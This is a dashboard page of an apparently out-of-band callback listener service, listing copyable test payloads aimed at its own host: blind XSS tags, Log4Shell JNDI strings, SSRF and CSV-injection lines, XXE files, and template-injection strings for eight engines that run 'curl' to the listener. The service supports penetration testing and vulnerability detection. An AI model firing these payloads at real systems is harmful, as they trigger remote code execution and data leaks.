dashboard · 86epgrch.pingback.sh

86epgrch.pingback.sh

demo homepage · created 2026-06-02 00:12 · expires 2026-07-02

By protocol

HTTP

DNS

XSS

SMTP

total69

last seen15:16:14

Payloads

HTTP / HTTPS https://86epgrch.pingback.sh/ copied

DNS 86epgrch.pingback.sh copied

Blind XSS "><script src=//86epgrch.pingback.sh/x></script> copied

SMTP anything@86epgrch.pingback.sh copied

Log4Shell JNDI ${jndi:ldap://86epgrch.pingback.sh/a} copied

Log4Shell DNS ${jndi:dns://86epgrch.pingback.sh/a} copied

SSRF http://86epgrch.pingback.sh/ssrf copied

CSV injection =WEBSERVICE("https://86epgrch.pingback.sh/csv") copied

XSS img onerror "><img src=x onerror="…//86epgrch.pingback.sh/x…"> copied

Click to download — upload to trigger OOB callback

SVG (HTTP callback) payload.svg ↓ download downloading…

SVG + XSS payload-xss.svg ↓ download downloading…

XML (XXE) payload.xml ↓ download downloading…

DTD (XXE OOB) payload.dtd ↓ download downloading…

PDF (SSRF on render) payload.pdf ↓ download downloading…

HTML (iframe) payload.html ↓ download downloading…

PNG polyglot payload.png ↓ download downloading…

Each payload triggers an HTTP callback to your listener if evaluated

Jinja2 (Python) {{…popen('curl https://86epgrch.pingback.sh/j2')…}} copied

SpEL / Spring *{T(Runtime).exec('curl https://86epgrch.pingback.sh/spel')} copied

Smarty (PHP) {system('curl https://86epgrch.pingback.sh/smarty')} copied

Velocity (Java) #set($x=$Runtime.exec('curl https://86epgrch.pingback.sh/vel')) copied

Razor (.NET) @(Process.Start('curl','https://86epgrch.pingback.sh/razor')) copied

FreeMarker (Java) <#assign ex=…>${ex('curl https://86epgrch.pingback.sh/ftl')} copied

Twig (PHP) {%set x=…popen('curl https://86epgrch.pingback.sh/twig')%} copied

ERB (Ruby) <%= `curl https://86epgrch.pingback.sh/erb` %> copied

Notifications

email — off

discord — off

telegram — off

💡 Add an email or webhook to get notified on every hit, even when this tab is closed.

Top source IPs

no hits yet

Top countries

no hits yet

Activity (last 24h)

hits today0

unique IPs0

top country—

busiest hour—

My listeners

loading…

0 selected

⏳

86epgrch.pingback.sh

Listener settings